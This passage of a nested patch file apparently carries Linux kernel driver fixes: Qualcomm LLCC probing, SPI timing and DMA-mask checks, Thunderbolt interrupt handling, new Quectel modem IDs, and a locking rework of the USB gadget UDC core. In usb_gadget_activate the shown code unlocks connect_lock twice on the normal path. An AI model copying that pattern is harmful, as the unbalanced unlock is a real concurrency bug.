++		kfree(base);
++	}
++
++	drv_data->bcast_regmap = qcom_llcc_init_mmio(pdev, i, "llcc_broadcast_base");
+ 	if (IS_ERR(drv_data->bcast_regmap)) {
+ 		ret = PTR_ERR(drv_data->bcast_regmap);
+ 		goto err;
+ 	}
+ 
+-	cfg = of_device_get_match_data(&pdev->dev);
+-
+ 	/* Extract version of the IP */
+ 	ret = regmap_read(drv_data->bcast_regmap, cfg->reg_offset[LLCC_COMMON_HW_INFO],
+ 			  &version);
+@@ -808,15 +837,6 @@ static int qcom_llcc_probe(struct platform_device *pdev)
+ 
+ 	drv_data->version = version;
+ 
+-	ret = regmap_read(drv_data->regmap, cfg->reg_offset[LLCC_COMMON_STATUS0],
+-			  &num_banks);
+-	if (ret)
+-		goto err;
+-
+-	num_banks &= LLCC_LB_CNT_MASK;
+-	num_banks >>= LLCC_LB_CNT_SHIFT;
+-	drv_data->num_banks = num_banks;
+-
+ 	llcc_cfg = cfg->sct_data;
+ 	sz = cfg->size;
+ 
+@@ -824,16 +844,6 @@ static int qcom_llcc_probe(struct platform_device *pdev)
+ 		if (llcc_cfg[i].slice_id > drv_data->max_slices)
+ 			drv_data->max_slices = llcc_cfg[i].slice_id;
+ 
+-	drv_data->offsets = devm_kcalloc(dev, num_banks, sizeof(u32),
+-							GFP_KERNEL);
+-	if (!drv_data->offsets) {
+-		ret = -ENOMEM;
+-		goto err;
+-	}
+-
+-	for (i = 0; i < num_banks; i++)
+-		drv_data->offsets[i] = i * BANK_OFFSET_STRIDE;
+-
+ 	drv_data->bitmap = devm_bitmap_zalloc(dev, drv_data->max_slices,
+ 					      GFP_KERNEL);
+ 	if (!drv_data->bitmap) {
+diff --git a/drivers/spi/spi-cadence-quadspi.c b/drivers/spi/spi-cadence-quadspi.c
+index 30fd4bc90580e..b371e4eb41ec3 100644
+--- a/drivers/spi/spi-cadence-quadspi.c
++++ b/drivers/spi/spi-cadence-quadspi.c
+@@ -1697,8 +1697,11 @@ static int cqspi_probe(struct platform_device *pdev)
+ 			cqspi->slow_sram = true;
+ 
+ 		if (of_device_is_compatible(pdev->dev.of_node,
+-					    "xlnx,versal-ospi-1.0"))
+-			dma_set_mask(&pdev->dev, DMA_BIT_MASK(64));
++					    "xlnx,versal-ospi-1.0")) {
++			ret = dma_set_mask(&pdev->dev, DMA_BIT_MASK(64));
++			if (ret)
++				goto probe_reset_failed;
++		}
+ 	}
+ 
+ 	ret = devm_request_irq(dev, irq, cqspi_irq_handler, 0,
+diff --git a/drivers/spi/spi-fsl-dspi.c b/drivers/spi/spi-fsl-dspi.c
+index a33e547b7d395..01930b52c4fb8 100644
+--- a/drivers/spi/spi-fsl-dspi.c
++++ b/drivers/spi/spi-fsl-dspi.c
+@@ -975,7 +975,9 @@ static int dspi_transfer_one_message(struct spi_controller *ctlr,
+ static int dspi_setup(struct spi_device *spi)
+ {
+ 	struct fsl_dspi *dspi = spi_controller_get_devdata(spi->controller);
++	u32 period_ns = DIV_ROUND_UP(NSEC_PER_SEC, spi->max_speed_hz);
+ 	unsigned char br = 0, pbr = 0, pcssck = 0, cssck = 0;
++	u32 quarter_period_ns = DIV_ROUND_UP(period_ns, 4);
+ 	u32 cs_sck_delay = 0, sck_cs_delay = 0;
+ 	struct fsl_dspi_platform_data *pdata;
+ 	unsigned char pasc = 0, asc = 0;
+@@ -1003,6 +1005,19 @@ static int dspi_setup(struct spi_device *spi)
+ 		sck_cs_delay = pdata->sck_cs_delay;
+ 	}
+ 
++	/* Since tCSC and tASC apply to continuous transfers too, avoid SCK
++	 * glitches of half a cycle by never allowing tCSC + tASC to go below
++	 * half a SCK period.
++	 */
++	if (cs_sck_delay < quarter_period_ns)
++		cs_sck_delay = quarter_period_ns;
++	if (sck_cs_delay < quarter_period_ns)
++		sck_cs_delay = quarter_period_ns;
++
++	dev_dbg(&spi->dev,
++		"DSPI controller timing params: CS-to-SCK delay %u ns, SCK-to-CS delay %u ns\n",
++		cs_sck_delay, sck_cs_delay);
++
+ 	clkrate = clk_get_rate(dspi->clk);
+ 	hz_to_spi_baud(&pbr, &br, spi->max_speed_hz, clkrate);
+ 
+diff --git a/drivers/target/target_core_transport.c b/drivers/target/target_core_transport.c
+index 86adff2a86edd..687adc9e086ca 100644
+--- a/drivers/target/target_core_transport.c
++++ b/drivers/target/target_core_transport.c
+@@ -504,6 +504,8 @@ target_setup_session(struct se_portal_group *tpg,
+ 
+ free_sess:
+ 	transport_free_session(sess);
++	return ERR_PTR(rc);
++
+ free_cnt:
+ 	target_free_cmd_counter(cmd_cnt);
+ 	return ERR_PTR(rc);
+diff --git a/drivers/thunderbolt/dma_test.c b/drivers/thunderbolt/dma_test.c
+index 3bedecb236e0d..14bb6dec6c4b0 100644
+--- a/drivers/thunderbolt/dma_test.c
++++ b/drivers/thunderbolt/dma_test.c
+@@ -192,9 +192,9 @@ static int dma_test_start_rings(struct dma_test *dt)
+ 	}
+ 
+ 	ret = tb_xdomain_enable_paths(dt->xd, dt->tx_hopid,
+-				      dt->tx_ring ? dt->tx_ring->hop : 0,
++				      dt->tx_ring ? dt->tx_ring->hop : -1,
+ 				      dt->rx_hopid,
+-				      dt->rx_ring ? dt->rx_ring->hop : 0);
++				      dt->rx_ring ? dt->rx_ring->hop : -1);
+ 	if (ret) {
+ 		dma_test_free_rings(dt);
+ 		return ret;
+@@ -218,9 +218,9 @@ static void dma_test_stop_rings(struct dma_test *dt)
+ 		tb_ring_stop(dt->tx_ring);
+ 
+ 	ret = tb_xdomain_disable_paths(dt->xd, dt->tx_hopid,
+-				       dt->tx_ring ? dt->tx_ring->hop : 0,
++				       dt->tx_ring ? dt->tx_ring->hop : -1,
+ 				       dt->rx_hopid,
+-				       dt->rx_ring ? dt->rx_ring->hop : 0);
++				       dt->rx_ring ? dt->rx_ring->hop : -1);
+ 	if (ret)
+ 		dev_warn(&dt->svc->dev, "failed to disable DMA paths\n");
+ 
+diff --git a/drivers/thunderbolt/nhi.c b/drivers/thunderbolt/nhi.c
+index 0a525f44ea316..4a6a3802d7e51 100644
+--- a/drivers/thunderbolt/nhi.c
++++ b/drivers/thunderbolt/nhi.c
+@@ -56,9 +56,14 @@ static int ring_interrupt_index(const struct tb_ring *ring)
+ 
+ static void nhi_mask_interrupt(struct tb_nhi *nhi, int mask, int ring)
+ {
+-	if (nhi->quirks & QUIRK_AUTO_CLEAR_INT)
+-		return;
+-	iowrite32(mask, nhi->iobase + REG_RING_INTERRUPT_MASK_CLEAR_BASE + ring);
++	if (nhi->quirks & QUIRK_AUTO_CLEAR_INT) {
++		u32 val;
++
++		val = ioread32(nhi->iobase + REG_RING_INTERRUPT_BASE + ring);
++		iowrite32(val & ~mask, nhi->iobase + REG_RING_INTERRUPT_BASE + ring);
++	} else {
++		iowrite32(mask, nhi->iobase + REG_RING_INTERRUPT_MASK_CLEAR_BASE + ring);
++	}
+ }
+ 
+ static void nhi_clear_interrupt(struct tb_nhi *nhi, int ring)
+diff --git a/drivers/thunderbolt/tb.c b/drivers/thunderbolt/tb.c
+index 3f1ab30c4fb15..e1eb092ad1d67 100644
+--- a/drivers/thunderbolt/tb.c
++++ b/drivers/thunderbolt/tb.c
+@@ -607,6 +607,7 @@ static void tb_scan_port(struct tb_port *port)
+ {
+ 	struct tb_cm *tcm = tb_priv(port->sw->tb);
+ 	struct tb_port *upstream_port;
++	bool discovery = false;
+ 	struct tb_switch *sw;
+ 	int ret;
+ 
+@@ -674,8 +675,10 @@ static void tb_scan_port(struct tb_port *port)
+ 	 * tunnels and know which switches were authorized already by
+ 	 * the boot firmware.
+ 	 */
+-	if (!tcm->hotplug_active)
++	if (!tcm->hotplug_active) {
+ 		dev_set_uevent_suppress(&sw->dev, true);
++		discovery = true;
++	}
+ 
+ 	/*
+ 	 * At the moment Thunderbolt 2 and beyond (devices with LC) we
+@@ -705,10 +708,14 @@ static void tb_scan_port(struct tb_port *port)
+ 	 * CL0s and CL1 are enabled and supported together.
+ 	 * Silently ignore CLx enabling in case CLx is not supported.
+ 	 */
+-	ret = tb_switch_enable_clx(sw, TB_CL1);
+-	if (ret && ret != -EOPNOTSUPP)
+-		tb_sw_warn(sw, "failed to enable %s on upstream port\n",
+-			   tb_switch_clx_name(TB_CL1));
++	if (discovery) {
++		tb_sw_dbg(sw, "discovery, not touching CL states\n");
++	} else {
++		ret = tb_switch_enable_clx(sw, TB_CL1);
++		if (ret && ret != -EOPNOTSUPP)
++			tb_sw_warn(sw, "failed to enable %s on upstream port\n",
++				   tb_switch_clx_name(TB_CL1));
++	}
+ 
+ 	if (tb_switch_is_clx_enabled(sw, TB_CL1))
+ 		/*
+diff --git a/drivers/tty/serial/lantiq.c b/drivers/tty/serial/lantiq.c
+index c892f3c7d1abc..112a2f5f6ac3f 100644
+--- a/drivers/tty/serial/lantiq.c
++++ b/drivers/tty/serial/lantiq.c
+@@ -278,6 +278,7 @@ lqasc_err_int(int irq, void *_port)
+ 	struct ltq_uart_port *ltq_port = to_ltq_uart_port(port);
+ 
+ 	spin_lock_irqsave(&ltq_port->lock, flags);
++	__raw_writel(ASC_IRNCR_EIR, port->membase + LTQ_ASC_IRNCR);
+ 	/* clear any pending interrupts */
+ 	asc_update_bits(0, ASCWHBSTATE_CLRPE | ASCWHBSTATE_CLRFE |
+ 		ASCWHBSTATE_CLRROE, port->membase + LTQ_ASC_WHBSTATE);
+diff --git a/drivers/usb/dwc3/core.c b/drivers/usb/dwc3/core.c
+index 9f8c988c25cb1..e999e6079ae03 100644
+--- a/drivers/usb/dwc3/core.c
++++ b/drivers/usb/dwc3/core.c
+@@ -1982,6 +1982,11 @@ static int dwc3_remove(struct platform_device *pdev)
+ 	pm_runtime_allow(&pdev->dev);
+ 	pm_runtime_disable(&pdev->dev);
+ 	pm_runtime_put_noidle(&pdev->dev);
++	/*
++	 * HACK: Clear the driver data, which is currently accessed by parent
++	 * glue drivers, before allowing the parent to suspend.
++	 */
++	platform_set_drvdata(pdev, NULL);
+ 	pm_runtime_set_suspended(&pdev->dev);
+ 
+ 	dwc3_free_event_buffers(dwc);
+diff --git a/drivers/usb/dwc3/dwc3-qcom.c b/drivers/usb/dwc3/dwc3-qcom.c
+index 959fc925ca7c5..79b22abf97276 100644
+--- a/drivers/usb/dwc3/dwc3-qcom.c
++++ b/drivers/usb/dwc3/dwc3-qcom.c
+@@ -308,7 +308,16 @@ static void dwc3_qcom_interconnect_exit(struct dwc3_qcom *qcom)
+ /* Only usable in contexts where the role can not change. */
+ static bool dwc3_qcom_is_host(struct dwc3_qcom *qcom)
+ {
+-	struct dwc3 *dwc = platform_get_drvdata(qcom->dwc3);
++	struct dwc3 *dwc;
++
++	/*
++	 * FIXME: Fix this layering violation.
++	 */
++	dwc = platform_get_drvdata(qcom->dwc3);
++
++	/* Core driver may not have probed yet. */
++	if (!dwc)
++		return false;
+ 
+ 	return dwc->xhci;
+ }
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index 8cd0d919ef63d..7e94d31687e9e 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -180,6 +180,7 @@ static void dwc3_gadget_del_and_unmap_request(struct dwc3_ep *dep,
+ 	list_del(&req->list);
+ 	req->remaining = 0;
+ 	req->needs_extra_trb = false;
++	req->num_trbs = 0;
+ 
+ 	if (req->request.status == -EINPROGRESS)
+ 		req->request.status = status;
+diff --git a/drivers/usb/gadget/udc/core.c b/drivers/usb/gadget/udc/core.c
+index bf9878e1a72a8..99f40611f459b 100644
+--- a/drivers/usb/gadget/udc/core.c
++++ b/drivers/usb/gadget/udc/core.c
+@@ -37,6 +37,14 @@ static struct bus_type gadget_bus_type;
+  * @vbus: for udcs who care about vbus status, this value is real vbus status;
+  * for udcs who do not care about vbus status, this value is always true
+  * @started: the UDC's started state. True if the UDC had started.
++ * @allow_connect: Indicates whether UDC is allowed to be pulled up.
++ * Set/cleared by gadget_(un)bind_driver() after gadget driver is bound or
++ * unbound.
++ * @connect_lock: protects udc->started, gadget->connect,
++ * gadget->allow_connect and gadget->deactivate. The routines
++ * usb_gadget_connect_locked(), usb_gadget_disconnect_locked(),
++ * usb_udc_connect_control_locked(), usb_gadget_udc_start_locked() and
++ * usb_gadget_udc_stop_locked() are called with this lock held.
+  *
+  * This represents the internal data structure which is used by the UDC-class
+  * to hold information about udc driver and gadget together.
+@@ -48,6 +56,9 @@ struct usb_udc {
+ 	struct list_head		list;
+ 	bool				vbus;
+ 	bool				started;
++	bool				allow_connect;
++	struct work_struct		vbus_work;
++	struct mutex			connect_lock;
+ };
+ 
+ static struct class *udc_class;
+@@ -660,17 +671,8 @@ out:
+ }
+ EXPORT_SYMBOL_GPL(usb_gadget_vbus_disconnect);
+ 
+-/**
+- * usb_gadget_connect - software-controlled connect to USB host
+- * @gadget:the peripheral being connected
+- *
+- * Enables the D+ (or potentially D-) pullup.  The host will start
+- * enumerating this gadget when the pullup is active and a VBUS session
+- * is active (the link is powered).
+- *
+- * Returns zero on success, else negative errno.
+- */
+-int usb_gadget_connect(struct usb_gadget *gadget)
++static int usb_gadget_connect_locked(struct usb_gadget *gadget)
++	__must_hold(&gadget->udc->connect_lock)
+ {
+ 	int ret = 0;
+ 
+@@ -679,10 +681,12 @@ int usb_gadget_connect(struct usb_gadget *gadget)
+ 		goto out;
+ 	}
+ 
+-	if (gadget->deactivated) {
++	if (gadget->deactivated || !gadget->udc->allow_connect || !gadget->udc->started) {
+ 		/*
+-		 * If gadget is deactivated we only save new state.
+-		 * Gadget will be connected automatically after activation.
++		 * If the gadget isn't usable (because it is deactivated,
++		 * unbound, or not yet started), we only save the new state.
++		 * The gadget will be connected automatically when it is
++		 * activated/bound/started.
+ 		 */
+ 		gadget->connected = true;
+ 		goto out;
+@@ -697,22 +701,31 @@ out:
+ 
+ 	return ret;
+ }
+-EXPORT_SYMBOL_GPL(usb_gadget_connect);
+ 
+ /**
+- * usb_gadget_disconnect - software-controlled disconnect from USB host
+- * @gadget:the peripheral being disconnected
+- *
+- * Disables the D+ (or potentially D-) pullup, which the host may see
+- * as a disconnect (when a VBUS session is active).  Not all systems
+- * support software pullup controls.
++ * usb_gadget_connect - software-controlled connect to USB host
++ * @gadget:the peripheral being connected
+  *
+- * Following a successful disconnect, invoke the ->disconnect() callback
+- * for the current gadget driver so that UDC drivers don't need to.
++ * Enables the D+ (or potentially D-) pullup.  The host will start
++ * enumerating this gadget when the pullup is active and a VBUS session
++ * is active (the link is powered).
+  *
+  * Returns zero on success, else negative errno.
+  */
+-int usb_gadget_disconnect(struct usb_gadget *gadget)
++int usb_gadget_connect(struct usb_gadget *gadget)
++{
++	int ret;
++
++	mutex_lock(&gadget->udc->connect_lock);
++	ret = usb_gadget_connect_locked(gadget);
++	mutex_unlock(&gadget->udc->connect_lock);
++
++	return ret;
++}
++EXPORT_SYMBOL_GPL(usb_gadget_connect);
++
++static int usb_gadget_disconnect_locked(struct usb_gadget *gadget)
++	__must_hold(&gadget->udc->connect_lock)
+ {
+ 	int ret = 0;
+ 
+@@ -724,7 +737,7 @@ int usb_gadget_disconnect(struct usb_gadget *gadget)
+ 	if (!gadget->connected)
+ 		goto out;
+ 
+-	if (gadget->deactivated) {
++	if (gadget->deactivated || !gadget->udc->started) {
+ 		/*
+ 		 * If gadget is deactivated we only save new state.
+ 		 * Gadget will stay disconnected after activation.
+@@ -747,6 +760,30 @@ out:
+ 
+ 	return ret;
+ }
++
++/**
++ * usb_gadget_disconnect - software-controlled disconnect from USB host
++ * @gadget:the peripheral being disconnected
++ *
++ * Disables the D+ (or potentially D-) pullup, which the host may see
++ * as a disconnect (when a VBUS session is active).  Not all systems
++ * support software pullup controls.
++ *
++ * Following a successful disconnect, invoke the ->disconnect() callback
++ * for the current gadget driver so that UDC drivers don't need to.
++ *
++ * Returns zero on success, else negative errno.
++ */
++int usb_gadget_disconnect(struct usb_gadget *gadget)
++{
++	int ret;
++
++	mutex_lock(&gadget->udc->connect_lock);
++	ret = usb_gadget_disconnect_locked(gadget);
++	mutex_unlock(&gadget->udc->connect_lock);
++
++	return ret;
++}
+ EXPORT_SYMBOL_GPL(usb_gadget_disconnect);
+ 
+ /**
+@@ -764,13 +801,14 @@ int usb_gadget_deactivate(struct usb_gadget *gadget)
+ {
+ 	int ret = 0;
+ 
++	mutex_lock(&gadget->udc->connect_lock);
+ 	if (gadget->deactivated)
+-		goto out;
++		goto unlock;
+ 
+ 	if (gadget->connected) {
+-		ret = usb_gadget_disconnect(gadget);
++		ret = usb_gadget_disconnect_locked(gadget);
+ 		if (ret)
+-			goto out;
++			goto unlock;
+ 
+ 		/*
+ 		 * If gadget was being connected before deactivation, we want
+@@ -780,7 +818,8 @@ int usb_gadget_deactivate(struct usb_gadget *gadget)
+ 	}
+ 	gadget->deactivated = true;
+ 
+-out:
++unlock:
++	mutex_unlock(&gadget->udc->connect_lock);
+ 	trace_usb_gadget_deactivate(gadget, ret);
+ 
+ 	return ret;
+@@ -800,8 +839,9 @@ int usb_gadget_activate(struct usb_gadget *gadget)
+ {
+ 	int ret = 0;
+ 
++	mutex_lock(&gadget->udc->connect_lock);
+ 	if (!gadget->deactivated)
+-		goto out;
++		goto unlock;
+ 
+ 	gadget->deactivated = false;
+ 
+@@ -810,9 +850,11 @@ int usb_gadget_activate(struct usb_gadget *gadget)
+ 	 * while it was being deactivated, we call usb_gadget_connect().
+ 	 */
+ 	if (gadget->connected)
+-		ret = usb_gadget_connect(gadget);
++		ret = usb_gadget_connect_locked(gadget);
++	mutex_unlock(&gadget->udc->connect_lock);
+ 
+-out:
++unlock:
++	mutex_unlock(&gadget->udc->connect_lock);
+ 	trace_usb_gadget_activate(gadget, ret);
+ 
+ 	return ret;
+@@ -1051,12 +1093,22 @@ EXPORT_SYMBOL_GPL(usb_gadget_set_state);
+ 
+ /* ------------------------------------------------------------------------- */
+ 
+-static void usb_udc_connect_control(struct usb_udc *udc)
++/* Acquire connect_lock before calling this function. */
++static void usb_udc_connect_control_locked(struct usb_udc *udc) __must_hold(&udc->connect_lock)
+ {
+ 	if (udc->vbus)
+-		usb_gadget_connect(udc->gadget);
++		usb_gadget_connect_locked(udc->gadget);
+ 	else
+-		usb_gadget_disconnect(udc->gadget);
++		usb_gadget_disconnect_locked(udc->gadget);
++}
++
++static void vbus_event_work(struct work_struct *work)
++{
++	struct usb_udc *udc = container_of(work, struct usb_udc, vbus_work);
++
++	mutex_lock(&udc->connect_lock);
++	usb_udc_connect_control_locked(udc);
++	mutex_unlock(&udc->connect_lock);
+ }
+ 
+ /**
+@@ -1067,6 +1119,14 @@ static void usb_udc_connect_control(struct usb_udc *udc)
+  *
+  * The udc driver calls it when it wants to connect or disconnect gadget
+  * according to vbus status.
++ *
++ * This function can be invoked from interrupt context by irq handlers of
++ * the gadget drivers, however, usb_udc_connect_control() has to run in
++ * non-atomic context due to the following:
++ * a. Some of the gadget driver implementations expect the ->pullup
++ * callback to be invoked in non-atomic context.
++ * b. usb_gadget_disconnect() acquires udc_lock which is a mutex.
++ * Hence offload invocation of usb_udc_connect_control() to workqueue.
+  */
+ void usb_udc_vbus_handler(struct usb_gadget *gadget, bool status)
+ {
+@@ -1074,7 +1134,7 @@ void usb_udc_vbus_handler(struct usb_gadget *gadget, bool status)
+ 
+ 	if (udc) {
+ 		udc->vbus = status;
+-		usb_udc_connect_control(udc);
++		schedule_work(&udc->vbus_work);
+ 	}
+ }
+ EXPORT_SYMBOL_GPL(usb_udc_vbus_handler);
+@@ -1097,7 +1157,7 @@ void usb_gadget_udc_reset(struct usb_gadget *gadget,
+ EXPORT_SYMBOL_GPL(usb_gadget_udc_reset);
+ 
+ /**
+- * usb_gadget_udc_start - tells usb device controller to start up
++ * usb_gadget_udc_start_locked - tells usb device controller to start up
+  * @udc: The UDC to be started
+  *
+  * This call is issued by the UDC Class driver when it's about
+@@ -1108,8 +1168,11 @@ EXPORT_SYMBOL_GPL(usb_gadget_udc_reset);
+  * necessary to have it powered on.
+  *
+  * Returns zero on success, else negative errno.
++ *
++ * Caller should acquire connect_lock before invoking this function.
+  */
+-static inline int usb_gadget_udc_start(struct usb_udc *udc)
++static inline int usb_gadget_udc_start_locked(struct usb_udc *udc)
++	__must_hold(&udc->connect_lock)
+ {
+ 	int ret;
+ 
+@@ -1126,7 +1189,7 @@ static inline int usb_gadget_udc_start(struct usb_udc *udc)
+ }
+ 
+ /**
+- * usb_gadget_udc_stop - tells usb device controller we don't need it anymore
++ * usb_gadget_udc_stop_locked - tells usb device controller we don't need it anymore
+  * @udc: The UDC to be stopped
+  *
+  * This call is issued by the UDC Class driver after calling
+@@ -1135,8 +1198,11 @@ static inline int usb_gadget_udc_start(struct usb_udc *udc)
+  * The details are implementation specific, but it can go as
+  * far as powering off UDC completely and disable its data
+  * line pullups.
++ *
++ * Caller should acquire connect lock before invoking this function.
+  */
+-static inline void usb_gadget_udc_stop(struct usb_udc *udc)
++static inline void usb_gadget_udc_stop_locked(struct usb_udc *udc)
++	__must_hold(&udc->connect_lock)
+ {
+ 	if (!udc->started) {
+ 		dev_err(&udc->dev, "UDC had already stopped\n");
+@@ -1295,12 +1361,14 @@ int usb_add_gadget(struct usb_gadget *gadget)
+ 
+ 	udc->gadget = gadget;
+ 	gadget->udc = udc;
++	mutex_init(&udc->connect_lock);
+ 
+ 	udc->started = false;
+ 
+ 	mutex_lock(&udc_lock);
+ 	list_add_tail(&udc->list, &udc_list);
+ 	mutex_unlock(&udc_lock);
++	INIT_WORK(&udc->vbus_work, vbus_event_work);
+ 
+ 	ret = device_add(&udc->dev);
+ 	if (ret)
+@@ -1432,6 +1500,7 @@ void usb_del_gadget(struct usb_gadget *gadget)
+ 	flush_work(&gadget->work);
+ 	device_del(&gadget->dev);
+ 	ida_free(&gadget_id_numbers, gadget->id_number);
++	cancel_work_sync(&udc->vbus_work);
+ 	device_unregister(&udc->dev);
+ }
+ EXPORT_SYMBOL_GPL(usb_del_gadget);
+@@ -1496,11 +1565,16 @@ static int gadget_bind_driver(struct device *dev)
+ 	if (ret)
+ 		goto err_bind;
+ 
+-	ret = usb_gadget_udc_start(udc);
+-	if (ret)
++	mutex_lock(&udc->connect_lock);
++	ret = usb_gadget_udc_start_locked(udc);
++	if (ret) {
++		mutex_unlock(&udc->connect_lock);
+ 		goto err_start;
++	}
+ 	usb_gadget_enable_async_callbacks(udc);
+-	usb_udc_connect_control(udc);
++	udc->allow_connect = true;
++	usb_udc_connect_control_locked(udc);
++	mutex_unlock(&udc->connect_lock);
+ 
+ 	kobject_uevent(&udc->dev.kobj, KOBJ_CHANGE);
+ 	return 0;
+@@ -1531,12 +1605,16 @@ static void gadget_unbind_driver(struct device *dev)
+ 
+ 	kobject_uevent(&udc->dev.kobj, KOBJ_CHANGE);
+ 
+-	usb_gadget_disconnect(gadget);
++	udc->allow_connect = false;
++	cancel_work_sync(&udc->vbus_work);
++	mutex_lock(&udc->connect_lock);
++	usb_gadget_disconnect_locked(gadget);
+ 	usb_gadget_disable_async_callbacks(udc);
+ 	if (gadget->irq)
+ 		synchronize_irq(gadget->irq);
+ 	udc->driver->unbind(gadget);
+-	usb_gadget_udc_stop(udc);
++	usb_gadget_udc_stop_locked(udc);
++	mutex_unlock(&udc->connect_lock);
+ 
+ 	mutex_lock(&udc_lock);
+ 	driver->is_bound = false;
+@@ -1622,11 +1700,15 @@ static ssize_t soft_connect_store(struct device *dev,
+ 	}
+ 
+ 	if (sysfs_streq(buf, "connect")) {
+-		usb_gadget_udc_start(udc);
+-		usb_gadget_connect(udc->gadget);
++		mutex_lock(&udc->connect_lock);
++		usb_gadget_udc_start_locked(udc);
++		usb_gadget_connect_locked(udc->gadget);
++		mutex_unlock(&udc->connect_lock);
+ 	} else if (sysfs_streq(buf, "disconnect")) {
+-		usb_gadget_disconnect(udc->gadget);
+-		usb_gadget_udc_stop(udc);
++		mutex_lock(&udc->connect_lock);
++		usb_gadget_disconnect_locked(udc->gadget);
++		usb_gadget_udc_stop_locked(udc);
++		mutex_unlock(&udc->connect_lock);
+ 	} else {
+ 		dev_err(dev, "unsupported command '%s'\n", buf);
+ 		ret = -EINVAL;
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index f05aea57e2d88..e12fec4c2e2f2 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -248,6 +248,8 @@ static void option_instat_callback(struct urb *urb);
+ #define QUECTEL_VENDOR_ID			0x2c7c
+ /* These Quectel products use Quectel's vendor ID */
+ #define QUECTEL_PRODUCT_EC21			0x0121
++#define QUECTEL_PRODUCT_EM061K_LTA		0x0123
++#define QUECTEL_PRODUCT_EM061K_LMS		0x0124
+ #define QUECTEL_PRODUCT_EC25			0x0125
+ #define QUECTEL_PRODUCT_EG91			0x0191
+ #define QUECTEL_PRODUCT_EG95			0x0195
+@@ -266,6 +268,8 @@ static void option_instat_callback(struct urb *urb);
+ #define QUECTEL_PRODUCT_RM520N			0x0801
+ #define QUECTEL_PRODUCT_EC200U			0x0901
+ #define QUECTEL_PRODUCT_EC200S_CN		0x6002
++#define QUECTEL_PRODUCT_EM061K_LWW		0x6008
++#define QUECTEL_PRODUCT_EM061K_LCN		0x6009
+ #define QUECTEL_PRODUCT_EC200T			0x6026
+ #define QUECTEL_PRODUCT_RM500K			0x7001
+ 
+@@ -1189,6 +1193,18 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K, 0xff, 0x00, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LCN, 0xff, 0xff, 0x30) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LCN, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LCN, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LMS, 0xff, 0xff, 0x30) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LMS, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LMS, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LTA, 0xff, 0xff, 0x30) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LTA, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LTA, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LWW, 0xff, 0xff, 0x30) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LWW, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LWW, 0xff, 0xff, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM12, 0xff, 0xff, 0xff),
+ 	  .driver_info = RSVD(1) | RSVD(2) | RSVD(3) | RSVD(4) | NUMEP2 },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM12, 0xff, 0, 0) },
+diff --git a/drivers/usb/typec/pd.c b/drivers/usb/typec/pd.c
+index b5ab26422c349..fd2477161e451 100644
+--- a/drivers/usb/typec/pd.c
++++ b/drivers/usb/typec/pd.c
+@@ -89,7 +89,7 @@ peak_current_show(struct device *dev, struct device_attribute *attr, char *buf)
+ static ssize_t
+ fast_role_swap_current_show(struct device *dev, struct device_attribute *attr, char *buf)
+ {
+-	return sysfs_emit(buf, "%u\n", to_pdo(dev)->pdo >> PDO_FIXED_FRS_CURR_SHIFT) & 3;
++	return sysfs_emit(buf, "%u\n", (to_pdo(dev)->pdo >> PDO_FIXED_FRS_CURR_SHIFT) & 3);
+ }
+ static DEVICE_ATTR_RO(fast_role_swap_current);
+ 
+diff --git a/drivers/usb/typec/ucsi/ucsi.c b/drivers/usb/typec/ucsi/ucsi.c
+index 086b509689839..47a2c73df3420 100644
+--- a/drivers/usb/typec/ucsi/ucsi.c
++++ b/drivers/usb/typec/ucsi/ucsi.c
+@@ -132,10 +132,8 @@ static int ucsi_exec_command(struct ucsi *ucsi, u64 cmd)
+ 	if (ret)
+ 		return ret;
+ 
+-	if (cci & UCSI_CCI_BUSY) {
+-		ucsi->ops->async_write(ucsi, UCSI_CANCEL, NULL, 0);
+-		return -EBUSY;
+-	}
++	if (cmd != UCSI_CANCEL && cci & UCSI_CCI_BUSY)
++		return ucsi_exec_command(ucsi, UCSI_CANCEL);
+ 
